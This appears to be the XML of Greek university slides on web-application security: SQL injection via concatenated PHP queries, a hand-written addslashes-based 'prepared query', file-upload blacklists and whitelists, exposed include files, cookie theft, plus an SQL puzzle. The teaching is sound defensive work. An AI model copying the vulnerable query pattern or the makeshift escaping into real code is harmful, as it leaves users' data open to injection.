              <a:t>Πρόβλημα ασφαλείας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452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4" y="1268760"/>
            <a:ext cx="5256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. $password .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”’ AND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. $user .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”’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54355" y="3933785"/>
            <a:ext cx="473829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064240" y="4640925"/>
            <a:ext cx="116394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8052" y="4490496"/>
            <a:ext cx="20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Δεδομένα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6930" y="2489710"/>
            <a:ext cx="136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Εντολές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80013" y="2674376"/>
            <a:ext cx="96619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2195736" y="1700807"/>
            <a:ext cx="288032" cy="375487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90" y="3393577"/>
            <a:ext cx="375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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Αλφαριθμητικό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208" y="3749119"/>
            <a:ext cx="20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Δεδομένα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4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Πώς διαχωρίζουμε εντολές/δεδομένα;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Δεν θα ήταν ωραίο να είχαμε...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prepared_query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AND name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;”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array( $password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user )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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3619082"/>
            <a:ext cx="136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Εντολές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878899" y="3803748"/>
            <a:ext cx="96619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52552" y="4384214"/>
            <a:ext cx="136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Δεδομένα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34024" y="4835786"/>
            <a:ext cx="410184" cy="720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22368" y="4857507"/>
            <a:ext cx="730511" cy="823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prepared_query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$code, $data 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$parts = explode( ‘?’, $code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= ‘’;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( $data as $value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array_shift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$parts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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘”’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="678930"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addslashes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$value).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‘”’;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array_shift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$parts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return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or die(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mysql_error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«Προετοιμασμένα» ερωτήματα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Ερωτήματα όπου ξεχωρίζουν τα δεδομένα από τις εντολές</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Η </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> προσφέρει και κάποιες έτοιμες λύσεις</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Βιβλιοθήκη </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PDO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://php.net/pdo</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Βιβλιοθήκη </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MySQLi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://php.net/mysqli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9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Ανασφαλές ανέβασμα αρχείων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Σύνηθες λάθος στην άσκηση </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>uploader</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Επιτρέπεται το ανέβασμα αρχείων </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.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l-GR" dirty="0" smtClean="0"/>
              <a:t>... τα οποία μετά μπορούν να τρέξουν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l-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>παράδειγμα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-G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Μαύρη λίστα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l-GR" dirty="0" smtClean="0"/>
              <a:t>ρόπος για εισαγωγή περιορισμών</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Στόχος συνήθως η διόρθωση προβλήματος ασφαλείας</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μαύρη λίστα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Σειρά από απαγορεύσεις</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Απαγορεύονται τα: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l-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.html </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία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l-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία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l-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία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8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l-GR" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Άσπρη λίστα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Ίδιος στόχος με την μαύρη λίστα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Πιο ασφαλές</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Σειρά από επιτρεπόμενα</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Επιτρέπονται τα:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.jpg, .bmp, .gif, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.zip, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.mp3, .mp4, .mpg, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>avi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.txt, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, .doc, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία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4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2016224"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μερικές ιδέες</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ας προσθέτουμε μερικούς «άχρηστους» χαρακτήρες στην αρχή του κωδικού</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ας κάνουμε κρυπτογράφηση </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Καίσαρα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> τον κωδικό με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στον </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>πριν τον στείλουμε</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>με σταθερό γνωστό κλειδί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367" y="2632342"/>
            <a:ext cx="8229600" cy="382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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ασφάλεια μέσω αφάνειας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Αν ο επιτιθέμενος</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>είχε αρκετό </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>χρόνο</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t> και </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>χρήμα</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Αν είχε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>πλήρη πρόσβαση στον κώδικα</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Θα μπορούσε να σπάσει την ασφάλειά μας;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Τότε πρόκειται για ασφάλεια μέσω αφάνειας</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>Αφάνεια ≠ Ασφάλεια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52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Άσπρη λίστα &gt; Μαύρη λίστα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Ποιος θα φανταζόταν ότι τα αρχεία </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“.php3” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>μπορεί να είναι επιζήμια;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Η άσπρη λίστα είναι πιο δύσκολο να γραφτεί</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Όμως </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>αν κάτι δεν πάει καλά </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>η προεπιλογή είναι η ασφάλεια και όχι η ανασφάλεια</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>...και πολύ συχνά κάτι δεν πάει καλά!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Γρίφος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Πριν τις Χριστουγεννιάτικες διακοπές παρουσιάσαμε έναν γρίφο</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> SQL</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR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Σχήμα</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>products</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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name</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>sellers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>sid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>supply</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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 err="1"/>
              <a:t>sid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>price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3689737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Ερώτημα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" sz="2000" dirty="0"/>
              <a:t>που να </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" sz="2000" dirty="0" smtClean="0"/>
              <a:t>εμφανίζει λίστα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" sz="2000" dirty="0"/>
              <a:t>από όλα τα προϊόντα (το όνομά τους) μαζί με την διεύθυνση όπου μπορούμε να τα προμηθευτούμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>φθηνότερα</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR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24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18301"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251520" y="548680"/>
          <a:ext cx="2232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Πορτοκάλια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Μανταρίνια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Μπανάνες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Λεμόνια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68941"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2771800" y="548680"/>
          <a:ext cx="38164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168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Μοναστηράκι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Ακρόπολη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Ζωγράφου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Ηλιούπολη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Γαλάτσι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92058"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6804248" y="548680"/>
          <a:ext cx="21602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97"/>
                <a:gridCol w="553997"/>
                <a:gridCol w="1052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68108"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251520" y="4797152"/>
          <a:ext cx="34563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Πορτοκάλια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Ζωγράφου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Μανταρίνια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Μοναστηράκι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Μπανάνες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Ηλιούπολη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Λεμόνια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Ακρόπολη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5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Γρίφος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Είναι σωστό;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name, address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products CROSS JOIN supply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products.pid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supply.pid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CROSS JOIN sellers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supply.sid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sellers.sid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price ASC;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53327" y="6215894"/>
            <a:ext cx="720080" cy="254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06388" y="604392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Εμφανίζει το ίδιο προϊόν πολλές φορές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Γρίφος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Είναι σωστό;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MIN( price ), name, address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products CROSS JOIN supply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products.pid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supply.pid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CROSS JOIN sellers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supply.sid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sellers.sid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07704" y="2420888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9752" y="207695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Ελάχιστη τιμή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88024" y="2487843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20072" y="21439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Αυθαίρετη διεύθυνση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Γρίφος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 smtClean="0"/>
              <a:t>Είναι σωστό;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name, address, price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products CROSS JOIN supply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products.pid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supply.pid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CROSS JOIN sellers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supply.sid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sellers.sid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price ASC;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94169" y="5404374"/>
            <a:ext cx="61509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35896" y="521970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Πρώτα γίνεται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22676" y="6205954"/>
            <a:ext cx="61509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60212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Έπειτα γίνεται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99992" y="2378779"/>
            <a:ext cx="0" cy="4230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198884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Λάθος διεύθυνση και τιμή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09457" y="2358172"/>
            <a:ext cx="426439" cy="4436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Γρίφος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Ιδέα! Ορισμός ελαχίστου:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Εκείνο για το οποίο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>δεν υπάρχει μικρότερο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>στο ίδιο σύνολο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l-GR" dirty="0" smtClean="0"/>
              <a:t>Μία αυτοένωση μας επιτρέπει σύγκριση με άλλα στοιχεία ώστε να βρούμε αυτό που δεν έχει άλλο μικρότερο.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4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name, address, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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cheap.price</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="23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products CROSS JOIN supply AS cheap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23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products.pid</a:t>
            </a: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cheap.pid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="23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CROSS JOIN sellers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23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cheap.sid</a:t>
            </a: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sellers.sid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="23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LEFT JOIN supply AS threat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23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products.pid</a:t>
            </a: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threat.pid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="23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AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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threat.price</a:t>
            </a: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3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cheap.price</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="23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threat.pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="23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23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NULL;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="23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526055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Δεν υπάρχει απειλή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788024" y="5445224"/>
            <a:ext cx="57606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0213" y="4252446"/>
            <a:ext cx="207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Ορισμός απειλής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141666" y="4005064"/>
            <a:ext cx="216024" cy="86409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Γρίφος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Λύθηκε από:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Νικόλας Κορασίδης</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Μάκης Αρσένης</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Σωκράτης Βίδρος</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Πάρις Κασιδιάρης</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Ηλίας Κανέλλος</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>Αλέξανδρος </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Γιδαράκος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761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Ανασφαλές </a:t>
            </a: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Πρόβλημα όταν:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Επιτρέπουμε την πρόσβαση σε αρχεία που κανονικά...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Είτε δεν θα έπρεπε να υπάρχει καθόλου πρόσβαση</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Είτε θα έπρεπε να είναι μόνο εκτελέσιμα και όχι αναγνώσιμα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>π.χ. χρήση κατάληξης </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>για τα </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>included </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αρχεία, αντί για </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php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b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>παράδειγμα)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180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Δυνατή κρυπτογράφιση που δεν σπάει</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Χρήση πιστοποιητικών</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν είναι δυνατές οι υποκλοπές δεδομένων</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Δεν είναι δυνατή η αλλαγή δεδομένων στο δίκτυο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Αν γίνει κάτι απ’ όλα αυτά</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="el-GR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο φυλλομετρητής μας προειδοποιεί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47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Ανασφαλές </a:t>
            </a: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Πρόβλμα όταν:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Κάνουμε </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>αρχείων χωρίς έλεγχο για το πού βρίσκονται</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μπορεί να δώσει πρόσβαση σε σημεία που δεν θέλουμε</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>(παράδειγμα)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70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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Συνήθως επιτρέπει πρόσβαση σε μπισκότα</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Μπισκότα = Πιστοποίηση</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Άρα επιτρέπει πρόσβαση</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>σε λογαριασμούς που δεν θα είχαμε κανονικά</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="el-GR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Το πιο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>δύσκολο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>πρόβλημα ασφαλείας στην κατανόηση για σήμερα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Βασική αρχή ασφαλείας του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Το </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>χρησιμοποιεί ένα μοντέλο «αμμοδοχείου»</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Ο </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0"/>
              <a:t>χρήστης μπορεί να μπει σε σελίδες </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0"/>
              <a:t>ελεύθερα χωρίς να φοβάται</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
              <a:t>Καμία σελίδα δεν μπορεί να </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" b="1" dirty="0" smtClean="0"/>
              <a:t>βλάψει</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="el-GR" dirty="0" smtClean="0"/>
